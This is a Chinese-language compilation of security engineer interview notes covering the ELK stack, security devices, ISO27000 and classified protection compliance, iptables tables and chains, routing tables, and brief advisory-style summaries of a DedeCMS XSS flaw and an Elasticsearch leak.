Elasticsearch是个开源分布式搜索引擎,它的特点有:分布式,零配置,自动发现,索引自动分片,索引副本机制,restful风格接口,多数据源,自动搜索负载等。Logstash是一个完全开源的工具,他可以对你的日志进行收集、过滤,并将其存储供以后使用(如,搜索)。Kibana 也是一个开源和免费的工具,它Kibana可以为 Logstash 和 ElasticSearch 提供的日志分析友好的 Web 界面,可以帮助您汇总、分析和搜索重要数据日志。

举例-阿里规范

用户历史命令记录

缺点:安全性不够。使用x-pack实现安全认证及权限管理功能

事件发生的分析

用户权限管理(修改)

防火墙

IPsec VPN

安全监控工具

web进入->堡垒机->内部防御HIDS->内部监控,日志审计zabbix性能监控工具HIDS

Linux木马查杀

常见的设备有啥

防火墙 utm 负载均衡设备IPS IDS(HIDS基于主机型入侵检测系统)堡垒机蜜罐网闸waf扫描器soc(ossim开源安全信息管理系统)

Windows运维

基线规范

木马查杀

脱壳,反汇编

计划任务

控制面板-管理工具-计划任务,在“任务计划程序库”上右键–创建基本任务

schtasks命令

语法:

schtasks /create /tn TaskName /tr TaskRun /sc schedule [/mo modifier] [/d day] [/m month[,month...] [/i IdleTime] [/st StartTime] [/sd StartDate] [/ed EndDate] [/scomputer [/u [domain]user /p password]] [/ru {[Domain]User | "System"} [/rpPassword]] /?

ISO27000和等保(重点等保)

说一下ISO27000

ISO27000是国际知名的信息安全管理体系标准,适用于整个企业,不仅仅是IT部门,还包括业务部门、财务、人事等部门。引入信息安全管理体系就可以协调各个方面信息管理,从而使管理更为有效。保证信息安全不是仅有一个防火墙,或找一个24小时提供信息安全服务的公司就可以达到的。它需要全面的综合管理。

PDCA(plan do check action)管理循环

说一下等级保护制度

《信息安全等级保护管理办法》是为规范信息安全等级保护管理,提高信息安全保障能力和水平,维护国家安全、社会稳定和公共利益,保障和促进信息化建设,根据《中华人民共和国计算机信息系统安全保护条例》等有关法律法规而制定的办法。

差异

浅谈信息安全等级保护与ISO27000系列标准的异同 ISSN 1009-3044

等保是以国家安全、社会秩序和公共利益为出发点,构建国家的安全保障体系。27000系列是以保证组织业务的连续性,缩减业务风险,最大化投资收益为目的,保证组织的业务安全

共性

算法

排序算法:快排 二分 冒泡

LDAP注入

/technology/9090.html

/quiet_girl/article/details/50716312

DedeCMS 跨站脚本漏洞

esdev DedeCMS(织梦内容管理系统)是中国卓卓网络(Desdev)公司的一套基于PHP的开源内容管理系统(CMS)。该系统具有内容发布、内容管理、内容编辑和内容检索等功能。 DedeCMS 5.8版本存在跨站脚本漏洞,该漏洞源于允许恶意用户向web页面注入代码,其他用户在浏览web页面时会受到影响。

Elasticsearch 安全漏洞

Elasticsearch是荷兰Elasticsearch公司的一套基于Lucene构建的开源分布式RESTful搜索引擎。该产品主要应用于云计算,并支持通过HTTP使用JSON进行数据索引。Security是其中的一个数据保护组件。

Elasticsearch 6.8.13版本和7.9.2之前版本存在安全漏洞,该漏洞源于在使用文档或字段级安全时包含文档泄露缺陷。在执行某些复杂查询时,搜索查询不能正确地保留安全权限。这可能导致搜索暴露了攻击者无法查看的文档的存在。攻击者可利用该漏洞对潜在的敏感索引有更多的了解。

iptables 表和链

默认情况下,iptables根据功能和表的定义划分包含三个表,filter,nat,mangle,其每个表又包含不同的操作链(chains )。 实际iptables包含4张表和五个链,主要记住filter即可。

1、四个表:

必须是小写raw ------------追踪数据包, ----此表用处较少,可以忽略不计mangle -------- 给数据打标记,做标记nat ---------网络地址转换即来源与目的的IP地址和port的转换。应用:和主机本身无关filter --------做过滤的,防火墙里面用的最多的表。表的应用顺序:raw-》mangle-》nat-》filter

2、五个链

五链:(必须是大写)链里面写的是规则。PREROUTING ---------------------进路由之前数据包INPUT -----------------就是过滤进来的数据包(输入)FORWARD -----------------转发OUTPUT ---------------发出去的数据包POSTROUTING --------------路由之后修改数据包所有的访问都是按顺序:入站:比如访问自身的web服务流量。先PREROUTING(是否改地址),再INPUT(是否允许)到达程序。转发:经过linux网关的流量.先PREROUTING(是否改地址),然后路由。转发给FORWARD(转发或者丢弃),最后经过POSTROUTING(看看改不改地址。)出站:源自linux自身的流量.先OUTPUT,然后路由。再给POSTROUTING(是否改IP)。规则顺序:ACL逐条匹配,匹配即停止。

3、四表五链

raw表里面:PREROUTINGOUTPUT总结:数据包跟踪 内核模块iptables_raw===============================================mangel表里面有5个链:PREROUTING INPUT FORWARD OUTPUT POSTROUTING路由标记用的表。内核模块iptables_mangle=====================================================nat表里面的链:PREROUTINGINPUTOUTPUTPOSTROUTING转换地址的表(改IP,改端口。当网关使用的linux。保护内外网流量。内核模块叫iptable_nat)==========================================filter表有三个链:重点INPUT #负责过滤所有目标是本机地址的数据包通俗来说:就是过滤进入主机的数据包FORWARD #负责转发流经主机的数据包。起到转发的作用OUTPUT #处理所有源地址是本机地址的数据包通俗的讲:就是处理从主机发出的数据包总结:根据规则来处理数据包,如转或者丢。就是实现主机型防火墙的主要表。内核模块 iptable_filter

路由表

在计算机网络中,路由表或称**路由择域信息库(RIB)**是一个存储在路由器或者联网计算机中的电子表格(文件)或类数据库。路由表存储着指向特定网络地址的路径(在有些情况下,还记录有路径的路由度量值)。路由表中含有网络周边的拓扑信息。路由表建立的主要目标是为了实现路由协议和静态路由选择。

每个路由器中都有一个路由表和FIB(Forward Information Base)表:路由表用来决策路由,FIB用来转发分组。路由表中有三类路由:

(1)链路层协议发现的路由(即是直连路由)

(2)静态路由

(3)动态路由协议发现的路由。

FIB表中每条转发项都指明分组到某个网段或者某个主机应该通过路由器的那个物理接口发送,然后就可以到达该路径的下一个路由器,或者不再经过别的路由器而传送到直接相连的网络中的目的主机。/***路由器的主要工作就是为经过路由器的每个数据包寻找一条最佳的传输路径,并将该数据有效地传送到目的站点。

如果觉得《【吐血整理】(面试大全)网络安全 渗透测试 安全服务工程师面试题》对你有帮助,请点赞、收藏,并留下你的观点哦!

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。